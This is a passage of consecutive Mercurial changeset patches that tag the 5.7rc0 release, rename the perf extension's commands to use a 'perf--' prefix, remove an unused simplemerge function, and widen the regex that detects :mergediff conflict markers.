persistent-nodemap: no no no @@ -1458,7 +1458,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1501,7 +1501,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611076925 18000 # Tue Jan 19 12:22:05 2021 -0500 # Node ID 3b1c0c36760657720ba782e365c18fd0f69712fc # Parent 4b0192f592cf1962576ef6b6bc688bd11ac2cbd6 # Parent 7e44d5ca2a2f976fb68413b872c6fa4f51cf429e merge with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -205,3 +205,4 @@ 0e06a7ab9e0d5c65af4e511aee1e0342998799df 0 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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -218,3 +218,4 @@ 0e06a7ab9e0d5c65af4e511aee1e0342998799df 5.6rc0 18c17d63fdabd009e70bf994e5efb7db422f4f7f 5.6 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 +9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1948,12 +1948,16 @@ Possible values are `abort` (default), `allow`, `upgrade-abort` and `upgrade-abort`. - `abort`: Disallows running any command and aborts - `allow`: Respects the feature presence in the share source - `upgrade-abort`: tries to upgrade the share to use share-safe; - if it fails, aborts - `upgrade-allow`: tries to upgrade the share; if it fails, continue by - respecting the share source setting + + ``abort`` + Disallows running any command and aborts + ``allow`` + Respects the feature presence in the share source + ``upgrade-abort`` + tries to upgrade the share to use share-safe; if it fails, aborts + ``upgrade-allow`` + tries to upgrade the share; if it fails, continue by + respecting the share source setting ``safe-mismatch.source-not-safe`` @@ -1962,13 +1966,16 @@ Possible values are `abort` (default), `allow`, `downgrade-abort` and `downgrade-abort`. - `abort`: Disallows running any command and aborts - `allow`: Respects the feature presence in the share source - `downgrade-abort`: tries to downgrade the share to not use share-safe; - if it fails, aborts - `downgrade-allow`: tries to downgrade the share to not use share-safe; - if it fails, continue by respecting the shared - source setting + + ``abort`` + Disallows running any command and aborts + ``allow`` + Respects the feature presence in the share source + ``downgrade-abort`` + tries to downgrade the share to not use share-safe; if it fails, aborts + ``downgrade-allow`` + tries to downgrade the share to not use share-safe; + if it fails, continue by respecting the shared source setting ``safe-mismatch.source-safe.warn`` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607073061 -3600 # Fri Dec 04 10:11:01 2020 +0100 # Node ID b8d8fd2fe75f37bf1de4e4d8bfdbd901fc5ae175 # Parent 3b1c0c36760657720ba782e365c18fd0f69712fc perf: use the `perf--` prefix for perf command This is the one command namespace where they should not be any ambiguity about command that should be in it. The perf extensions is only adding performance related command. so this is a good ground to start putting dash folding to the tests. Differential Revision: https://phab.mercurial-scm.org/D9516 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perfwalk', formatteropts) +@command(b'perf--walk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perfannotate', formatteropts) +@command(b'perf--annotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perfstatus', + b'perf--status', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perfaddremove', formatteropts) +@command(b'perf--addremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None -@command(b'perfheads', formatteropts) +@command(b'perf--heads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perftags', + b'perf--tags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perfancestors', formatteropts) +@command(b'perf--ancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perfancestorset', formatteropts) +@command(b'perf--ancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,7 +910,7 @@ fm.end() -@command(b'perfdiscovery', formatteropts, b'PATH') +@command(b'perf--discovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] @@ -928,7 +928,7 @@ @command( - b'perfbookmarks', + b'perf--bookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +953,7 @@ fm.end() -@command(b'perfbundleread', formatteropts, b'BUNDLE') +@command(b'perf--bundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. @@ -1080,7 +1080,7 @@ @command( - b'perfchangegroupchangelog', + b'perf--changegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1116,7 @@ fm.end() -@command(b'perfdirs', formatteropts) +@command(b'perf--dirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1132,7 @@ @command( - b'perfdirstate', + b'perf--dirstate', [ ( b'', @@ -1195,7 +1195,7 @@ fm.end() -@command(b'perfdirstatedirs', formatteropts) +@command(b'perf--dirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1212,7 @@ fm.end() -@command(b'perfdirstatefoldmap', formatteropts) +@command(b'perf--dirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1233,7 @@ fm.end() -@command(b'perfdirfoldmap', formatteropts) +@command(b'perf--dirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1255,7 @@ fm.end() -@command(b'perfdirstatewrite', formatteropts) +@command(b'perf--dirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1297,7 @@ @command( - b'perfmergecalculate', + b'perf--mergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1330,7 @@ @command( - b'perfmergecopies', + b'perf--mergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1353,7 @@ fm.end() -@command(b'perfpathcopies', [], b"REV REV") +@command(b'perf--pathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1369,7 @@ @command( - b'perfphases', + b'perf--phases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1394,7 @@ fm.end() -@command(b'perfphasesremote', [], b"[DEST]") +@command(b'perf--phasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1455,7 +1455,7 @@ @command( - b'perfmanifest', + b'perf--manifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1499,7 @@ fm.end() -@command(b'perfchangeset', formatteropts) +@command(b'perf--changeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1513,7 @@ fm.end() -@command(b'perfignore', formatteropts) +@command(b'perf--ignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1532,7 @@ @command( - b'perfindex', + b'perf--index', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1596,7 @@ @command( - b'perfnodemap', + b'perf--nodemap', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), @@ -1667,7 +1667,7 @@ fm.end() -@command(b'perfstartup', formatteropts) +@command(b'perf--startup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1685,7 @@ fm.end() -@command(b'perfparents', formatteropts) +@command(b'perf--parents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1712,7 @@ fm.end() -@command(b'perfctxfiles', formatteropts) +@command(b'perf--ctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1725,7 @@ fm.end() -@command(b'perfrawfiles', formatteropts) +@command(b'perf--rawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1739,7 @@ fm.end() -@command(b'perflookup', formatteropts) +@command(b'perf--lookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1748,7 @@ @command( - b'perflinelogedits', + b'perf--linelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1786,7 @@ fm.end() -@command(b'perfrevrange', formatteropts) +@command(b'perf--revrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1795,7 @@ fm.end() -@command(b'perfnodelookup', formatteropts) +@command(b'perf--nodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1814,7 @@ @command( - b'perflog', + b'perf--log', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1832,7 @@ fm.end() -@command(b'perfmoonwalk', formatteropts) +@command(b'perf--moonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1851,7 @@ @command( - b'perftemplating', + b'perf--templating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1941,7 @@ @command( - b'perfhelper-mergecopies', + b'perf--helper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2124,7 @@ @command( - b'perfhelper-pathcopies', + b'perf--helper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2263,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perfcca', formatteropts) +@command(b'perf--cca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2271,7 @@ fm.end() -@command(b'perffncacheload', formatteropts) +@command(b'perf--fncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2284,7 @@ fm.end() -@command(b'perffncachewrite', formatteropts) +@command(b'perf--fncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2304,7 @@ fm.end() -@command(b'perffncacheencode', formatteropts) +@command(b'perf--fncacheencode', formatteropts) def perffncacheencode(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2348,7 @@ @command( - b'perfbdiff', + b'perf--bdiff', revlogopts + formatteropts + [ @@ -2464,7 +2464,7 @@ @command( - b'perfunidiff', + b'perf--unidiff', revlogopts + formatteropts + [ @@ -2543,7 +2543,7 @@ fm.end() -@command(b'perfdiffwd', formatteropts) +@command(b'perf--diffwd', formatteropts) def perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2568,7 @@ fm.end() -@command(b'perfrevlogindex', revlogopts + formatteropts, b'-c|-m|FILE') +@command(b'perf--revlogindex', revlogopts + formatteropts, b'-c|-m|FILE') def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2704,7 @@ @command( - b'perfrevlogrevisions', + b'perf--revlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2754,7 @@ @command( - b'perfrevlogwrite', + b'perf--revlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3047,7 @@ @command( - b'perfrevlogchunks', + b'perf--revlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3176,7 @@ @command( - b'perfrevlogrevision', + b'perf--revlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3319,7 +3319,7 @@ @command( - b'perfrevset', + b'perf--revset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3352,7 @@ @command( - b'perfvolatilesets', + b'perf--volatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3401,7 @@ @command( - b'perfbranchmap', + b'perf--branchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3492,7 @@ @command( - b'perfbranchmapupdate', + b'perf--branchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3602,7 @@ @command( - b'perfbranchmapload', + b'perf--branchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,7 +3661,7 @@ fm.end() -@command(b'perfloadmarkers') +@command(b'perf--loadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo @@ -3673,7 +3673,7 @@ @command( - b'perflrucachedict', + b'perf--lrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3829,7 @@ @command( - b'perfwrite', + b'perf--write', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3892,7 @@ @command( - b'perfprogress', + b'perf--progress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,109 +78,121 @@ list of commands: - perfaddremove + perf--addremove + (no help text available) + perf--ancestors (no help text available) - perfancestors + perf--ancestorset (no help text available) - perfancestorset + perf--annotate (no help text available) - perfannotate (no help text available) - perfbdiff benchmark a bdiff between revisions - perfbookmarks + perf--bdiff benchmark a bdiff between revisions + perf--bookmarks benchmark parsing bookmarks from disk to memory - perfbranchmap + perf--branchmap benchmark the update of a branchmap - perfbranchmapload + perf--branchmapload benchmark reading the branchmap - perfbranchmapupdate + perf--branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perfbundleread + perf--bundleread Benchmark reading of bundle files. - perfcca (no help text available) - perfchangegroupchangelog + perf--cca (no help text available) + perf--changegroupchangelog Benchmark producing a changelog group for a changegroup. - perfchangeset + perf--changeset + (no help text available) + perf--ctxfiles (no help text available) - perfctxfiles (no help text available) - perfdiffwd Profile diff of working directory changes - perfdirfoldmap + perf--diffwd Profile diff of working directory changes + perf--dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perfdirs (no help text available) - perfdirstate benchmap the time of various distate operations - perfdirstatedirs + perf--dirs (no help text available) + perf--dirstate + benchmap the time of various distate operations + perf--dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perfdirstatefoldmap + perf--dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perfdirstatewrite + perf--dirstatewrite benchmap the time it take to write a dirstate on disk - perfdiscovery + perf--discovery benchmark discovery between local repo and the peer at given path - perffncacheencode + perf--fncacheencode (no help text available) - perffncacheload + perf--fncacheload (no help text available) - perffncachewrite + perf--fncachewrite (no help text available) - perfheads benchmark the computation of a changelog heads - perfhelper-mergecopies + perf--heads benchmark the computation of a changelog heads + perf--helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perfhelper-pathcopies + perf--helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perfignore benchmark operation related to computing ignore - perfindex benchmark index creation time followed by a lookup - perflinelogedits + perf--ignore benchmark operation related to computing ignore + perf--index benchmark index creation time followed by a lookup + perf--linelogedits (no help text available) - perfloadmarkers + perf--loadmarkers benchmark the time to parse the on-disk markers for a repo - perflog (no help text available) - perflookup (no help text available) - perflrucachedict + perf--log (no help text available) + perf--lookup (no help text available) + perf--lrucachedict (no help text available) - perfmanifest benchmark the time to read a manifest from disk and return a + perf--manifest + benchmark the time to read a manifest from disk and return a usable - perfmergecalculate + perf--mergecalculate (no help text available) - perfmergecopies + perf--mergecopies measure runtime of 'copies.mergecopies' - perfmoonwalk benchmark walking the changelog backwards - perfnodelookup + perf--moonwalk + benchmark walking the changelog backwards + perf--nodelookup (no help text available) - perfnodemap benchmark the time necessary to look up revision from a cold + perf--nodemap + benchmark the time necessary to look up revision from a cold nodemap - perfparents benchmark the time necessary to fetch one changeset's parents. - perfpathcopies + perf--parents + benchmark the time necessary to fetch one changeset's parents. + perf--pathcopies benchmark the copy tracing logic - perfphases benchmark phasesets computation - perfphasesremote + perf--phases benchmark phasesets computation + perf--phasesremote benchmark time needed to analyse phases of the remote server - perfprogress printing of progress bars - perfrawfiles (no help text available) - perfrevlogchunks + perf--progress + printing of progress bars + perf--rawfiles + (no help text available) + perf--revlogchunks Benchmark operations on revlog chunks. - perfrevlogindex + perf--revlogindex Benchmark operations against a revlog index. - perfrevlogrevision + perf--revlogrevision Benchmark obtaining a revlog revision. - perfrevlogrevisions + perf--revlogrevisions Benchmark reading a series of revisions from a revlog. - perfrevlogwrite + perf--revlogwrite Benchmark writing a series of revisions to a revlog. - perfrevrange (no help text available) - perfrevset benchmark the execution time of a revset - perfstartup (no help text available) - perfstatus benchmark the performance of a single status call - perftags (no help text available) - perftemplating + perf--revrange + (no help text available) + perf--revset benchmark the execution time of a revset + perf--startup + (no help text available) + perf--status benchmark the performance of a single status call + perf--tags (no help text available) + perf--templating test the rendering time of a given template - perfunidiff benchmark a unified diff between revisions - perfvolatilesets + perf--unidiff + benchmark a unified diff between revisions + perf--volatilesets benchmark the computation of various volatile set - perfwalk (no help text available) - perfwrite microbenchmark ui.write (and others) + perf--walk (no help text available) + perf--write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) $ hg perfaddremove # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611037929 28800 # Mon Jan 18 22:32:09 2021 -0800 # Node ID 98e3a693061ac49aaefc10ff449eb69a46886442 # Parent b8d8fd2fe75f37bf1de4e4d8bfdbd901fc5ae175 simplemerge: delete unused find_unconflicted() The function has been unused ever since it was introduced in 465b9ea02868 (Import 3-way merge code from bzr, 2007-04-16). Differential Revision: https://phab.mercurial-scm.org/D9832 diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -402,31 +402,6 @@ return sl - def find_unconflicted(self): - """Return a list of ranges in base that are not conflicted.""" - am = mdiff.get_matching_blocks(self.basetext, self.atext) - bm = mdiff.get_matching_blocks(self.basetext, self.btext) - - unc = [] - - while am and bm: - # there is an unconflicted block at i; how long does it - # extend? until whichever one ends earlier. - a1 = am[0][0] - a2 = a1 + am[0][2] - b1 = bm[0][0] - b2 = b1 + bm[0][2] - i = intersect((a1, a2), (b1, b2)) - if i: - unc.append(i) - - if a2 < b2: - del am[0] - else: - del bm[0] - - return unc - def _verifytext(text, path, ui, opts): """verifies that text is non-binary (unless opts[text] is passed, diff --git a/tests/test-simplemerge.py b/tests/test-simplemerge.py --- a/tests/test-simplemerge.py +++ b/tests/test-simplemerge.py @@ -141,8 +141,6 @@ """No conflicts because nothing changed""" m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb']) - self.assertEqual(m3.find_unconflicted(), [(0, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)], @@ -189,8 +187,6 @@ [b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb'] ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)], @@ -271,8 +267,6 @@ [b'aaa\n', b'222\n', b'bbb\n'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)], @@ -323,8 +317,6 @@ [b'aaa', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)], @@ -338,8 +330,6 @@ [b'aaa', b'222', b'222', b'222', b'222', b'bbb'], ) - self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)]) - self.assertEqual( list(m3.find_sync_regions()), [(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)], # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611093642 28800 # Tue Jan 19 14:00:42 2021 -0800 # Node ID 0c95b59a89f17aabb202e1f1502b311f6b854d3b # Parent 98e3a693061ac49aaefc10ff449eb69a46886442 resolve: also detect new :mergediff conflict markers The conflict markers created by `:mergediff` were not detected as conflicts, which affects both `commands.resolve.mark-check` and `mergetools.<tool>.check`. This patch fixes that. The new regex it uses for finding conflict markers is less restrictive because it `:mergediff` doesn't follow the `<<<<<<<` and `>>>>>>>` lines by a space (and a description). Hopefully lines like that don't give too many false positives. We can add back the space and make `:mergediff` add trailing spaces if it turns out to be a problem. OTOH, there will always be some false positives and we have ways of overriding the checks already. This patch can go onto the default or stable branch, depending on how much we care about an experimental feature. Differential Revision: https://phab.mercurial-scm.org/D9835 diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1195,7 +1195,11 @@ def hasconflictmarkers(data): return bool( - re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE) + re.search( + br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$", + data, + re.MULTILINE, + ) ) diff --git 